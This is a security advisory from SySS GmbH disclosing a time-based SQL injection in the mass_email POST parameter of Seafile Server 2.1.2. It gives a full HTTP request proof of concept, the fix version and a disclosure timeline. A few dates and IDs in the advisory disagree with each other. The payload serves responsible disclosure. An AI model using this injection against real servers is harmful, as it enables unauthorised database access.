Advisory - Seafile Server Community Edition

Advisory: Seafile Server Community Edition

Advisory ID:SYSS-2014-001 
Product: Seafile Server Community Edition
Vendor: Seafile Ltd.
Affected Version(s):until 2.1.2 Linux
Tested Version (s):2.1.2 Linux, 2.1.3 Linux
Vulnerability Type:SQL Injection
Risk Level:High
Solution Status: None
Vendor Notification:January, 2014 
Solution Date:Open
Public Disclosure:Open 
CVE  Reference:Not assigned
Author Advisory: Marcel Mangold, SySS GmbH, https://www.syss.de/advisories/ Document date: 2013-01-07,

 

Overview

The software suffers from at least one sql injection vulnerability

 

Vulnerability Details:

The script which handels requests to message/message_send/?from=user has an POST parameter called mass_email that is vulnerable to sql injection. (Fixed in version 2.1.3).

Proof of Concept (PoC):

 

Request:

+------------------------------------

POST /message/message_send/?from=user HTTP/1.1

Host: 127.0.0.1:8000 User-Agent: Mozilla/5.0

Accept: application/json, text/javascript, */*; q=0.01

Accept-Language: de Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-CSRFToken: dAjlY2zLmP1SmdoneDzTBRG6XynhhAVk

X-Requested-With: XMLHttpRequest

Referer: 127.0.0.1/user/2/msgs/

Content-Length: 120

Cookie: csrftoken=dAjlY2zLmP1SmdoneDzTBRG6XynhhAVk; sessionid=zrqax2zwfbjo51h8ttilp7r7yujrwxeq

Connection: keep-alive

Pragma: no-cache

Cache-Control: no-cache mass_msg=asdf&mass_email=victim%40sample.xy'+AND+1%3dLIKE('SYSS',UPPER(HEX(RANDOMBLOB(500000000/2))))+AND+'syss'%3d'syss

 

Effect

Response is delayed - if the value of mass_email is changed to victim%40sample.xy the answer is delivered almost instantly. The vulnerability could be verified  using sqlmap [3].

Solution

Update to version 2.1.3.

Disclosure Timeline

2014-01-07 - Vulnerability discovered

2014-01-07 - Vulnerability reported to developer

2014-01-08 - Fix commited to github by developer

2014-01-11 - Information about fix sent to me by email

2014-01-13 - Verified fix

 

References

 

[1] SySS GmbH, SYSS-2013-002 - www.syss.de/advisories/SYSS-2014-001 -  SQL-Injection in Seafile 2.1.2 Server

[2] SySS GmbH, SySS Responsible Disclosure Policy - www.syss.de/responsible_disclosure_policy

[3] sqlmap.org

 

Credits

 

Security vulnerability found by Responsible Hacker of the SySS GmbH. E-Mail: marcel.mangold@syss.de Public Key: www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Marcel_Mangold.asc Key ID: AC15E5BE Key Fingerprint: E21C 69ED 9A64 7486 6EDD 5E29 4EFE B20B AC15

E5BE

 

Disclaimer

The information provided in this security advisory is provided "as is" and without warranty of any kind.  Details of this security advisory may be updated in order to provide as accurate information as possible.  The latest version of this security advisory is available on the SySS Web site [1].

 

Copyright

 

Creative Commons - Attribution (by) - Version 3.0 URL: creativecommons.org/licenses/by/3.0/deed.en

Ihr direkter Kontakt zu SySS +49 (0)7071 - 40 78 56-0 oder anfrage@syss.de | IN DRINGENDEN FÄLLEN AUSSERHALB DER GESCHÄFTSZEITEN +49 (0)7071 - 40 78 56-99

Als Rahmenvertragskunde wählen Sie bitte die bereitgestellte Rufbereitschaftsnummer

Ihr direkter Kontakt zu SySS +49 (0)7071 - 40 78 56-0 oder anfrage@syss.de

IN DRINGENDEN FÄLLEN AUSSERHALB DER GESCHÄFTSZEITEN +49 (0)7071 - 40 78 56-99

Als Rahmenvertragskunde wählen Sie bitte die bereitgestellte Rufbereitschaftsnummer

Direkter Kontakt

+49 (0)7071 - 40 78 56-0 oder anfrage@syss.de

IN DRINGENDEN FÄLLEN AUSSERHALB DER GESCHÄFTSZEITEN

+49 (0)7071 - 40 78 56-99

Als Rahmenvertragskunde wählen Sie bitte die bereitgestellte Rufbereitschaftsnummer